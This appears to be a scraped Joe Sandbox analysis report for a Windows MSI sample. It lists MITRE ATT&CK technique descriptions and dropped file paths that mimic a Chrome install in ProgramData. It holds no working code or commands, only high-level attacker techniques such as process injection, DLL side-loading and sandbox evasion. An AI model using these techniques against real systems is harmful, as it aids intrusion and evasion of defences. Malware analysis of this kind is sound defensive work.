Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Br_i421i2-2481-125_754864.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\4b3b29.rbs

C:\ProgramData\Chrome\Application\118.0.5993.120\124.0.6367.119.manifest

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.108

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112

Windows Analysis Report
Br_i421i2-2481-125_754864.msi